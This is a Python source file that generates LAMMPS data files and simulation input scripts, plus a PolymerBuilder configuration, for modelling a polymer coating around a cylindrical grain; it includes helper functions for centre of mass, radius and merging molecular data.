# Dir['Velocities'][eval(ln[0])].append(eval(ln[6]))
# Dir['Velocities'][eval(ln[0])].append(eval(ln[7]))
# Dir['Velocities'][eval(ln[0])][0]=eval(ln[5])
# Dir['Velocities'][eval(ln[0])][1]=eval(ln[6])
# Dir['Velocities'][eval(ln[0])][2]=eval(ln[7])
# src.close()
# write_data(Dir, ofile)
def write_data(Dir, ofile, v=1, a=0):
des = open(ofile, "w")
des.write("LAMMPS data file via Tongtong\n")
des.write("\n")
if a:
ilist = ["atom"]
List = ["Masses", "Atoms", "Velocities"]
else:
ilist = ["atom", "bond", "angle", "dihedral", "improper"]
List = [
"Masses",
"Pair Coeffs",
"Bond Coeffs",
"Angle Coeffs",
"Dihedral Coeffs",
"Improper Coeffs",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for i in ilist:
if (i + "s") in Dir:
des.write("%d %s\n" % (Dir[i + "s"], (i + "s")))
des.write("%d %s\n" % (Dir[i + " types"], (i + " types")))
des.write("\n")
for i in ["x", "y", "z"]:
des.write(
"%f %f %s %s\n" % (Dir[i + "lo"], Dir[i + "hi"], (i + "lo"), (i + "hi"))
)
des.write("\n")
if v == 0:
List.remove("Velocities")
for key in List:
if key in Dir and len(Dir[key]) > 0:
des.write(key + "\n")
des.write("\n")
for i in Dir[key]:
des.write(str(i) + " " + " ".join(str(j) for j in Dir[key][i]) + "\n")
des.write("\n")
des.close()
def input_coat4(na, cpos, idata, odata):
des = open("run_coat4.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("pair_style lj/cut/coul/long 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("kspace_style pppm 1.0e-6\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line multi\n")
des.write("\n")
des.write("dump 1 all atom 500 coat2.dump\n")
des.write("\n")
des.write("label loopa\n")
des.write("variable i loop %d\n" % na)
des.write(" variable k equal $i\n")
des.write(" variable h equal x[$k]\n")
des.write(" variable p equal y[$k]\n")
des.write(' print "x= $h"\n')
des.write(' print "y= $p"\n')
des.write(" variable dx equal $h-%f\n" % cpos[0])
des.write(" variable dy equal $p-%f\n" % cpos[1])
des.write(" variable dr equal sqrt(${dx}*${dx}+${dy}*${dy})\n")
des.write(" variable nvx equal -${dx}/${dr}*0.01\n")
des.write(" variable nvy equal -${dy}/${dr}*0.01\n")
des.write(" set atom $k vx ${nvx} vy ${nvy} vz 0.0\n")
des.write("next i\n")
des.write("jump SELF loopa\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat4.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('na', str(na))
# filedata = filedata.replace('ccx', str(cpos[0]))
# filedata = filedata.replace('ccy', str(cpos[1]))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# Write the file out again
# with open('run_coat4.in', 'w') as file:
# file.write(filedata)
def input_coat5(cpos, radius, oradius, idata, odata, tstep, X6paircoeffs, mctemp):
des = open("run_coat5.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("#pair_style lj/cut/coul/long 12.0\n")
des.write("pair_style buck/coul/cut 10.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
src = open(X6paircoeffs)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line one\n")
des.write("\n")
des.write(
"region inner cylinder z %f %f %f INF INF units box side out\n"
% (cpos[0], cpos[1], radius - 2)
)
des.write(
"region outter cylinder z %f %f %f INF INF units box side in\n"
% (cpos[0], cpos[1], oradius + 3.5)
)
des.write("\n")
des.write("comm_style tiled\n")
des.write("fix LB all balance 1000 1.1 rcb\n")
des.write("\n")
des.write("fix 1 all wall/region inner lj126 5.0 3.5 12.0\n")
des.write("fix 8 all wall/region outter lj126 5.0 3.5 3.5\n")
des.write("\n")
des.write("fix 2 all nvt temp %f %f 100 \n" % (mctemp, mctemp))
des.write("\n")
des.write("reset_timestep %d\n" % tstep)
des.write("\n")
des.write("dump 1 all atom 500 coat5.*.dump\n")
des.write("\n")
des.write("run 5000\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat5.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('ccx', str(cpos[0]))
# filedata = filedata.replace('ccy', str(cpos[1]))
# filedata = filedata.replace('radius', str(radius-2))
# filedata = filedata.replace('oadius', str(oradius+3.5))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# filedata = filedata.replace('tstep', str(tstep))
# Write the file out again
# with open('run_coat5.in', 'w') as file:
# file.write(filedata)
def input_coat6(na, idata, odata):
des = open("run_coat6.in", "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("#special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("#dielectric 1.0\n")
des.write("#pair_style lj/cut/coul/long 12.0\n")
des.write("#bond_style harmonic\n")
des.write("#angle_style harmonic\n")
des.write("#improper_style harmonic\n")
des.write("#kspace_style pppm 1.0e-6\n")
des.write("\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("thermo_style custom temp vol density pxx pyy pzz lx ly lz\n")
des.write("thermo 100\n")
des.write("thermo_modify flush yes line multi\n")
des.write("\n")
des.write("dump 1 all atom 500 coat2.dump\n")
des.write("\n")
des.write("label loopa\n")
des.write("variable i loop %d\n" % na)
des.write(" variable k equal $i\n")
des.write(" variable h equal x[$k]\n")
des.write(" variable p equal y[$k]\n")
des.write(' print "x= $h"\n')
des.write(' print "y= $p"\n')
des.write(" variable dx equal $h \n")
des.write(" variable dy equal $p \n")
des.write(" variable dr equal sqrt(${dx}*${dx}+${dy}*${dy})\n")
des.write(" variable nvx equal -${dx}/${dr}*0.001\n")
des.write(" variable nvy equal -${dy}/${dr}*0.001\n")
des.write(" set atom $k vx ${nvx} vy ${nvy} vz 0.0\n")
des.write("next i\n")
des.write("jump SELF loopa\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat6.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('na', str(na))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# Write the file out again
# with open('run_coat6.in', 'w') as file:
# file.write(filedata)
def input_coat7(oradius, idata, odata, tstep, polymer_type, HE_type, mctemp):
des = open("run_coat7.in", "w")
des.write("newton on\n")
des.write("boundary p p p\n")
des.write("units real\n")
des.write("box tilt large\n")
des.write("\n")
des.write("include ../potential_head.mod\n")
des.write("read_data %s\n" % idata)
des.write("\n")
des.write("group polymer type 1:%d\n" % polymer_type)
des.write("group HE type %d:%d\n" % (polymer_type + 1, HE_type + polymer_type))
des.write("\n")
des.write("include potential.mod\n")
des.write("\n")
des.write(" compute stress all stress/atom NULL\n")
des.write(" compute PEbond all pe/atom bond\n")
des.write(" compute PEangle all pe/atom angle\n")
des.write(
" compute PEdihed all pe/atom dihedral\n"
)
des.write(" compute PEimp all pe/atom improper\n")
des.write(" compute PEinter all pe/atom pair\n")
des.write("\n")
des.write(
"thermo_style custom step time etotal pe ke temp press pxx pyy pzz pxy pxz pyz density evdwl ecoul epair \
ebond eangle edihed eimp lx ly evdwl\n"
)
des.write("thermo 5\n")
des.write("\n")
des.write("#-------------------------------------------------------------\n")
des.write("# SIMULATION SETUP\n")
des.write("#-------------------------------------------------------------\n")
des.write("#\n")
des.write("\n")
des.write("comm_style tiled\n")
des.write("fix 2 all balance 1000 1.1 rcb\n")
des.write("\n")
des.write("run_style verlet\n")
des.write("\n")
des.write(
"region outter cylinder z 0.0 0.0 %f INF INF units box side in\n"
% (oradius + 3.5)
)
des.write("\n")
des.write(
"fix 6 HE rigid group 1 HE force * off off off torque * off off off\n"
)
des.write("fix 7 polymer nvt temp %f %f 50\n" % (mctemp, mctemp))
des.write("fix 8 all wall/region outter lj126 5.0 3.5 3.5\n")
des.write("dump 1 all atom 500 coat7.*.dump\n")
des.write("\n")
des.write("reset_timestep %d\n" % tstep)
des.write("\n")
des.write("run 5000\n")
des.write("unfix 6\n")
des.write("unfix 7\n")
des.write("\n")
des.write("write_data %s\n" % odata)
des.write("\n")
des.close()
# with open('coat7.in', 'r') as file:
# filedata = file.read()
# Replace the target string
# filedata = filedata.replace('oadius', str(oradius+3.5))
# filedata = filedata.replace('idata', idata)
# filedata = filedata.replace('odata', odata)
# filedata = filedata.replace('tstep', str(tstep))
# filedata = filedata.replace('polymer_type', ('1:%d' %polymer_type))
# filedata = filedata.replace('HE_type', ('%d:%d' %(polymer_type+1,HE_type+polymer_type)))
# Write the file out again
# with open('run_coat7.in', 'w') as file:
# file.write(filedata)
def Get_Mass_Radius(Dir, center, dimension=3, plane="xy"):
D = 0
if dimension == 3:
for a_id in Dir["Atoms"]:
d = 0
for i in range(3):
d += (Dir["Atoms"][a_id][3 + i] - center[i]) ** 2
if D < d:
D = d
else:
i_range = []
index = {"x": 0, "y": 1, "z": 2}
for xyz in ["x", "y", "z"]:
if xyz in plane:
i_range.append(index[xyz])
for a_id in Dir["Atoms"]:
d = 0
for i in i_range:
d += (Dir["Atoms"][a_id][3 + i] - center[i]) ** 2
if D < d:
D = d
return np.sqrt(D), center
def Get_Center_of_Mass(Dir_ori):
M = 0
Mx = 0
My = 0
Mz = 0
for a_id in Dir_ori["Atoms"]:
m = Dir_ori["Masses"][Dir_ori["Atoms"][a_id][1]][0]
M += m
Mx += m * Dir_ori["Atoms"][a_id][3]
My += m * Dir_ori["Atoms"][a_id][4]
Mz += m * Dir_ori["Atoms"][a_id][5]
return [Mx / M, My / M, Mz / M]
def data_Translation(Dir, vector, box=0):
for a_id in Dir["Atoms"]:
Dir["Atoms"][a_id][3] += vector[0]
Dir["Atoms"][a_id][4] += vector[1]
Dir["Atoms"][a_id][5] += vector[2]
if box:
for i, xyz in enumerate(["x", "y", "z"]):
for lh in ["lo", "hi"]:
Dir[xyz + lh] += vector[i]
return Dir
def add_data(Dir_1, Dir_2, add="append"):
Dir_data = {}
for i in ["atom", "bond", "angle", "dihedral", "improper"]:
if (i + "s") in Dir_1:
Dir_data[i + "s"] = Dir_1[i + "s"]
Dir_data[i + " types"] = Dir_1[i + " types"]
if (i + "s") in Dir_2:
if (i + "s") in Dir_data:
Dir_data[i + "s"] += Dir_2[i + "s"]
Dir_data[i + " types"] += Dir_2[i + " types"]
else:
Dir_data[i + "s"] = Dir_2[i + "s"]
Dir_data[i + " types"] = Dir_2[i + " types"]
if ("extra " + i + " per atom") in Dir_1:
Dir_data["extra " + i + " per atom"] = Dir_1["extra " + i + " per atom"]
if ("extra " + i + " per atom") in Dir_2:
if ("extra " + i + " per atom") in Dir_data:
Dir_data["extra " + i + " per atom"] = max(
Dir_1["extra " + i + " per atom"], Dir_2["extra " + i + " per atom"]
)
else:
Dir_data["extra " + i + " per atom"] = Dir_2["extra " + i + " per atom"]
for i in ["x", "y", "z"]:
if (i + "lo") in Dir_1:
Dir_data[i + "lo"] = Dir_1[i + "lo"]
Dir_data[i + "hi"] = Dir_1[i + "hi"]
if (i + "lo") in Dir_2:
if (i + "lo") not in Dir_data:
Dir_data[i + "lo"] = Dir_2[i + "lo"]
Dir_data[i + "hi"] = Dir_2[i + "hi"]
List = [
"Masses",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for key in List:
if key in Dir_1 and len(Dir_1[key]) > 0:
Dir_data[key] = Dir_1[key]
if key in Dir_2 and len(Dir_2[key]) > 0:
if key in Dir_data:
if key in [
"Masses",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]:
if key == "Atoms":
a_ids = {}
inimol = max([Dir_data[key][i][0] for i in Dir_data[key]])
ini = max([i for i in Dir_data[key]])
for a_id in Dir_2[key]:
if key == "Atoms":
a_ids[a_id] = ini + a_id
Dir_data[key][ini + a_id] = Dir_2[key][a_id]
if key == "Atoms":
Dir_data[key][ini + a_id][0] = Dir_2[key][a_id][0] + inimol
Dir_data[key][ini + a_id][1] = (
Dir_2[key][a_id][1] + Dir_1["atom types"]
)
if key == "Bonds":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["bond types"]
)
if key == "Angles":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["angle types"]
)
if key == "Dihedrals":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["dihedral types"]
)
if key == "Impropers":
Dir_data[key][ini + a_id][0] = (
Dir_2[key][a_id][0] + Dir_1["improper types"]
)
if key in ["Bonds", "Angles", "Dihedrals", "Impropers"]:
for i in range(1, len(Dir_2[key][a_id])):
Dir_data[key][ini + a_id][i] = a_ids[
Dir_data[key][ini + a_id][i]
]
else:
Dir_data[key] = Dir_2[key]
return Dir_data
# def grabprocessors(ifile):
# src = open(ifile)
# for line in src.readlines():
# ln = line.split()
# if ln and ln[0] == "read_data":
# datafile = ln[1]
# break
# src.close()
# Dir = read_data(datafile)
# atoms = Dir["atoms"]
# if "bonds" in Dir:
# return atoms / 2000 + 1
# else:
# return atoms / 1000 + 1
def correctppn(ppn):
nodes = ppn / 20 + 1 if (ppn / 20 and ppn % 20) else ppn / 20 if ppn / 20 else 1
if not ppn / 20:
ppn = (
20
if ppn > 10
else 10
if ppn > 8
else 8
if ppn > 4
else 4
if ppn > 2
else 2
if ppn > 1
else 1
)
return nodes, 20 if ppn / 20 else ppn, nodes * 20 if ppn / 20 else ppn
def shiftpotential(ifile1, ifile2, ofile, Dir_polymer):
src = open(ifile1)
des = open(ofile, "w")
for line in src.readlines():
ln = line.split("#")[0].split()
if ln:
if ln[0] == "pair_coeff":
des.write(" ".join(ln[0:3]) + " buck " + " ".join(ln[3:]) + "\n")
src.close()
src = open(ifile2)
for line in src.readlines():
ln = line.split("#")[0].split()
if ln:
if ln[0] == "pair_coeff":
if ln[1] != "*":
ln[1] = str(eval(ln[1]) + Dir_polymer["atom types"])
if ln[2] != "*":
ln[2] = str(eval(ln[2]) + Dir_polymer["atom types"])
if ln[0] == "bond_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["bond types"])
if ln[0] == "angle_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["angle types"])
if ln[0] == "dihedral_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["dihedral types"])
if ln[0] == "improper_coeff":
ln[1] = str(eval(ln[1]) + Dir_polymer["improper types"])
des.write(" ".join(ln) + "\n")
src.close()
for key in ["Bond", "Angle", "Dihedral", "Improper"]:
if (key + " Coeffs") in Dir_polymer:
for i in Dir_polymer[key + " Coeffs"]:
if key == "Bond":
des.write(
"bond_coeff %i harmonic %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Angle":
des.write(
"angle_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Dihedral":
des.write(
"dihedral_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
elif key == "Improper":
des.write(
"improper_coeff %i %s\n"
% (
i,
" ".join([str(k) for k in Dir_polymer[key + " Coeffs"][i]]),
)
)
des.close()
def addatomtype(ifile, ofile, elementlist):
src = open(ifile)
des = open(ofile, "w")
a = 1
for line in src.readlines():
ln = line.split()
if ln:
des.write(" ".join(ln) + "\n")
a += 1
src.close()
for e in elementlist:
if e == "C":
des.write("%d C_3\n" % a)
else:
des.write("%d %s\n" % (a, e))
a += 1
des.close()
# def writeghostdata(ifile):
# Dir = read_data(ifile)
# write_data(Dir, "ghost_grain.data", v=0, a=1)
def writepolymodfile(polymer_type_custom, ofile1):
mw = {}
des = open(ofile1, "w")
des.write("#\n")
des.write("# PolymerBuilder input file: order of inputs is critical\n")
des.write("#\n")
des.write("\n")
des.write("# Temperature (K)\n")
des.write("mctemp # Temperature (K)\n")
des.write("\n")
des.write("# Elements: atomic type indices for all monomers\n")
des.write(
"%d # Number of atom types\n"
% polymer_type_custom["atom_type"]
)
atom_type = {}
a_id = 0
for i in range(polymer_type_custom["nm"]):
for j in range(len(polymer_type_custom["monomer"][i + 1]["info"])):
if polymer_type_custom["monomer"][i + 1]["info"][j][0] not in atom_type:
a_id += 1
atom_type[a_id] = polymer_type_custom["monomer"][i + 1]["info"][j][0]
atom_type[polymer_type_custom["monomer"][i + 1]["info"][j][0]] = a_id
ofile = open("str2lammps/types/custom_atom_type.dat", "w")
for i in range(polymer_type_custom["atom_type"]):
des.write(
"%s # Type %d element\n"
% (atom_type[i + 1].split("_")[0], (i + 1))
)
ofile.write("%d %s\n" % ((i + 1), atom_type[i + 1]))
ofile.close()
des.write("\n")
des.write("# Number of monomers\n")
des.write("%d # Number of monomer types\n" % polymer_type_custom["nm"])
des.write("\n")
for i in range(polymer_type_custom["nm"]):
des.write("# Monomer: z-matrix\n")
des.write(
"%d # Number of atoms in z-matrix (lengths in A, angles in degrees)\n"
% len(polymer_type_custom["monomer"][i + 1]["info"])
)
for j in range(len(polymer_type_custom["monomer"][i + 1]["info"])):
des.write(
str(atom_type[polymer_type_custom["monomer"][i + 1]["info"][j][0]])
+ " "
+ " ".join(polymer_type_custom["monomer"][i + 1]["info"][j][1:])
+ "\n"
)
des.write(
"%d # Number of backbone atoms, z-matrix top\n"
% polymer_type_custom["monomer"][i + 1]["torsion"]["len"]
)
des.write("\n")
des.write("# Monomer: backbone torsion angle probabilities\n")
des.write(
"# Starting with backbone atom 3, specify whether the torsion should change, \n"
)
des.write("# and, if so, how.\n")
des.write("# Values for specification:\n")
des.write("# 0: no change\n")
des.write("# 1: uniform probability for all angles\n")
des.write("# 2: energy levels associated with specific angles\n")
des.write("# 3: probability associated with specific angles\n")
des.write("\n")
if "all" in polymer_type_custom["monomer"][i + 1]["torsion"]:
for j in range(polymer_type_custom["monomer"][i + 1]["torsion"]["len"] - 2):
tor_type = int(
polymer_type_custom["monomer"][i + 1]["torsion"]["all"][0]
)
des.write(
"%d # Torsion %d specification\n"
% (tor_type, (j + 3))
)
if tor_type == 2 or tor_type == 3:
src = open(
"../"
+ polymer_type_custom["monomer"][i + 1]["torsion"]["all"][1]
)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
else:
for j in range(polymer_type_custom["monomer"][i + 1]["torsion"]["len"] - 2):
if str(j + 3) in polymer_type_custom["monomer"][i + 1]["torsion"]:
tor_type = int(
polymer_type_custom["monomer"][i + 1]["torsion"][str(j + 3)][0]
)
des.write(
"%d # Torsion %d specification\n"
% (tor_type, (j + 3))
)
if tor_type == 2 or tor_type == 3:
src = open(
"../"
+ polymer_type_custom["monomer"][i + 1]["torsion"][
str(j + 3)
][1]
)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
else:
print(
"Backbone torsion angle %d probabilities type for monomer %d not specified, use default with \
no change"
% ((j + 3), (i + 1))
)
tor_type = 0
des.write(
"%d # Torsion %d specification: no change\n"
% (tor_type, (j + 3))
)
des.write("\n")
des.write(
"3.0 # Torsion delta: change in torsions is +/- this value\n"
)
des.write(
"10 # Number of torsion delta steps to minimize torsion energy\n"
)
des.write("\n")
des.write("# Backbone bond length between all monomers (A)\n")
des.write("1.53\n")
des.write("\n")
des.write("# Monomer arrangements\n")
des.write(
"%d # Number of monomer arrangements\n"
% polymer_type_custom["nc"]
)
for i in range(polymer_type_custom["nc"]):
mw[i] = 0
if polymer_type_custom["chain"][i + 1]["arrangement"]["type"]:
des.write(
"1 # Arrangement: 0 = pattern, 1 = probability\n"
)
des.write(
"%s # Probability of monomer(s)\n"
% (
" ".join(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]
)
)
)
length = len(polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"])
for j in range(length):
mw[i] += polymer_type_custom["monomer"][j + 1]["mass"] * float(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"][j]
)
else:
des.write(
"0 # Arrangement: 0 = pattern, 1 = probability\n"
)
des.write(
"%d # Number of monomers in first pattern\n"
% polymer_type_custom["chain"][i + 1]["arrangement"]["len"]
)
des.write(
"%s # Repeat...\n"
% (
" ".join(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]
)
)
)
length = polymer_type_custom["chain"][i + 1]["arrangement"]["len"]
for j in polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]:
mw[i] += polymer_type_custom["monomer"][int(j)]["mass"] / length
r_mw = 0
for i in range(polymer_type_custom["nc"]):
des.write("%f " % polymer_type_custom["chain"][i + 1]["probability"])
r_mw += mw[i] * polymer_type_custom["chain"][i + 1]["probability"]
des.write(" # Probabilities of each monomer arrangement\n")
des.write("\n")
des.write("# System\n")
des.write("nc # Number of chains to build\n")
des.write("nm # Number of monomers per chain\n")
des.write(
"lcx lcy lcz # Dimensions of cell (A); not used if density > 0.0\n"
)
des.write("0.0 # Density in g/cm^3\n")
des.write("\n")
des.write("# Excluded cylinders -- define volumes in which no polymer exists\n")
des.write("1 # Number of excluded cylinders\n")
des.write(
"ccx ccy ccz # Cylinder 1: start position x y z -- cylinder end center \n"
)
des.write(
"dx dy dz # Cylinder 1: direction from start position -- axis\n"
)
des.write("crad # Cylinder 1: radius, extension from axis\n")
des.write("clc # Cylinder 1: length\n")
des.write("\n")
des.write("1 # Included cylinders -- define volumes in which polymers exist\n")
des.write(
"ccx ccy ccz # Cylinder 1 : start position x y z -- cylinder end center\n"
)
des.write("dx dy dz # Cylinder 1 : direction from start position -- axis\n")
des.write("irad # Cylinder 1 : radius, extension from axis\n")
des.write("clc # Cylinder 1 : length\n")
des.write("\n")
des.write("# Excluded slabs -- define volumes in which no polymer exists\n")
des.write("0 # Number of excluded slabs\n")
des.write("\n")
des.write("# Configurations and interactions\n")
des.write("40 # Max number of configurations to test\n")
des.write(
"1.0 # Keep chains which are this fraction of desired length\n"
)
des.write("1 # 1: Self-avoiding\n")
des.write("1 # Self-avoiding cutoff (A)\n")
des.write("1 # 1: Long range interactions\n")
des.write("5 # Interaction cutoff (A)\n")
des.write("5.0 # Bin size (A)\n")
des.write("4 # Bond cutoff\n")
des.write("\n")
des.write("# Output\n")
des.write(
"1 # 1: Write (unwrapped) PDB file of constructed chains\n"
)
des.write(
"1 # 1: Write wrapped PDB file of constructed chains\n"
)
des.write("0 # 1: Write PDB files of monomer rotation\n")
des.write(
"0 # 1: Write output file of chain length vs. # monomers\n"
)
des.write("0 # 1: Write output file of chain length histogram\n")
des.write(
"0 # 1: Write torsion angle probabilities, selection histogram\n"
)
des.write("0 # 1: Write z-matrices of all chains\n")
des.write("0 # 1: Write final system energy\n")
des.write("\n")
des.write("#\n")
des.write("# Status and messages\n")
des.write("#\n")
des.write("1 # 1: Write messages to stdout; 0: Write to file\n")
des.write(
"# If previous line is 1, nothing more is needed; if it is 0, file name follows\n"
)
des.write("#/path/to/log.build\n")
des.write("1 # 1: Write status to stdout; 0: Write to file\n")
des.write(
"# XXX Only one of status.build or bar/Rappture flag should be uncommented!!\n"
)
des.write("# If writing status to file, file name follows\n")
des.write("#/path/to/status.build\n")
des.write(
"# ELSE if writing status to stdout, 1: terminal bar, 0: Rappture status lines\n"
)
des.write("1\n")
des.write("\n")
des.write("# RNG seed; use time if 0\n")
des.write("0 \n")
des.write("\n")
des.write(
"# Scale factor used to compare atom distances in monomer to equilibrium bond\n"
)
des.write(
"# distances when searching for bonds not specified in monomer z-matrix\n"
)
des.write("1.1\n")
des.write("\n")
des.close()
return r_mw
def write_minimize(ofile, X6file, afile):
des = open(ofile, "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("pair_style lj/cut 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("read_data step0.data # polymer_relax.data\n")
des.write("neighbor 0.3 bin\n")
des.write(
"thermo_style custom step etotal ke temp pe ebond eangle edihed eimp evdwl ecoul elong press pxx pyy pzz \
pxy pxz pyz lx ly lz vol density\n"
)
des.write("thermo 10\n")
des.write("thermo_modify flush yes\n")
des.write("fix LB all balance 1000 1.05 shift xy 10 1.05\n")
des.write("# Minimization parameters\n")
des.write("min_style cg # hftn\n")
des.write("min_modify dmax 0.02\n")
des.write("min_modify line quadratic # backtrack\n")
des.write("neigh_modify every 1 delay 0\n")
LJ_params = {
"H": [3.195, 0.0152],
"C": [3.8983, 0.0951],
"N": [3.6621, 0.0774],
"O": [3.4046, 0.0957],
"F": [3.4720, 0.0725],
"S": [4.0300, 0.3440],
"Cl": [3.9503, 0.2833],
"Si": [4.27, 0.31],
}
d0_to_epsilon = 1.0
r0_to_sigma = 1.0 / (2.0 ** (1.0 / 6.0))
lj_D0 = {}
lj_R0 = {}
src = open(afile)
el_types = {}
for line in src.readlines():
ln = line.split()
if ln:
el_types[int(ln[0])] = ln[1].split("_")[0]
ntypes = len(el_types)
for i in range(ntypes):
lj_R0[i] = {}
lj_D0[i] = {}
param_i = LJ_params[el_types[i + 1]]
for j in range(i, ntypes):
param_j = LJ_params[el_types[j + 1]]
lj_R0[i][j] = np.sqrt(param_i[0] * param_j[0])
lj_D0[i][j] = np.sqrt(param_i[1] * param_j[1])
lammps_min_steps = 5000
lammps_min_levels = 3
lammps_min_init = 0.5
dp = (1.0 - lammps_min_init) / (lammps_min_levels - 1)
for level in range(lammps_min_levels):
des.write("# Minimization %d\n" % (i + 1))
for i in range(ntypes):
for j in range(i, ntypes):
des.write("pair_coeff %d %d " % (i + 1, j + 1))
d0 = lj_D0[i][j] * (lammps_min_init + dp * level)
r0 = lj_R0[i][j] * (lammps_min_init + dp * level)
des.write("%f %f\n" % (d0 * d0_to_epsilon, r0 * r0_to_sigma))
des.write("minimize 1.0e-9 1.0e-9 %d 100000\n" % lammps_min_steps)
des.write("# Dump minimized system\n")
des.write("dump 1 all atom 1 min.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("run 0\n")
des.write("undump 1\n")
des.write("# MD parameters\n")
des.write("neigh_modify every 1 delay 5\n")
des.write("pair_style buck/coul/long 12.0 12.0\n")
des.write("kspace_style pppm 1e-4\n")
src = open(X6file)
for line in src.readlines():
des.write(line)
des.write("minimize 1.0e-9 1.0e-9 %d 100000\n" % lammps_min_steps)
des.write("write_data step1.data\n")
des.write("\n")
# def main(args):
# args = complete_args(args)
# os.system("cp polymer_types/" + polymer_type + "/* .")
# Get number of chains, molecules
# p_fra = 0.05
# if "p_fra" in args:
# if len(args["p_fra"]) == 1:
# p_fra = eval(args["p_fra"][0])
# if p_fra < 0 or p_fra > 1:
# print("Please input a valid number between 0 to 1")
# return False
# else:
# print(
# "Molecular weight fraction of polymer coated: "
# + str(p_fra * 100)
# + "%"
# )
# else:
# print("Please specify molecular weight fraction of polymer coated")
# return False
# else:
# print("Default 5% molecular weight fraction of polymer coated")
# nm = 40
# if "nm" in args:
# if len(args["nm"]) == 1:
# nm = eval(args["nm"][0])
# if nm < 1:
# print("Please input a valid number equal or larger than 1")
# return False
# else:
# print(str(int(nm)) + " monomers per chain")
# else:
# print("Please specify number of monomers per chain")
# return False
# else:
# print("Default 40 monomers per chain")
# mctemp = 600
# if "mctemp" in args:
# if len(args["mctemp"]) == 1:
# mctemp = eval(args["mctemp"][0])
# if mctemp < 0:
# print("Please input a valid number equal or larger than 0")
# return False
# else:
# print("Monte Carlo temperature: " + str(mctemp) + " K")
# else:
# print("Please specify Monte Carlo temperature")
# return False
# else:
# print("Default Monte Carlo temperature: 600 K")
# np_flag = 0
# rnp_flag = 0
# if "parallel" in args:
# np_flag = 1
# print("LAMMPS will run in parallel mode")
# if len(args["parallel"]) > 0:
# if args["parallel"] == ["np"]:
# if len(args["parallel"]) > 1:
# np = int(eval(args["parallel"][1]))
# if np <= 0:
# print("Please input a valid number larger than 0")
# return False
# else:
# print("%d of processors will be in use" % np)
# else:
# print("Please input a number of processors you want to use")
# return False
# else:
# rnp_flag = 1
# print(
# "Will calculating recommended number of processors after initial polymer configuration generated"
# )
# else:
# rnp_flag = 1
# print(
# "Will calculating recommended number of processors after initial polymer configuration generated"
# )
# print("Running Lammps, get information about grain")
# Run Lammps, get information about grain
# Center of cylinder from upper and lower coordinates
# input_file(datafile)
# os.chdir('..')
# writeinlammps(datafile, potential_headfile, potentialfile)
# run_lammps()
# os.system('mv inr.lammps code')
# os.system('mv log.lammps code')
# os.system('mv tmp.out code')
# os.chdir('code')
# cell_sizes, delta_cell = read_cell_sizes("../" + datafile)
# periodic = min(delta_cell.items(), key=lambda x: x[1])[0]
# mass, com, boundaries, coord, radius = get_boundaries(periodic)
# dimension = 2
# plane = "xy"
# writeghostdata("../" + datafile)
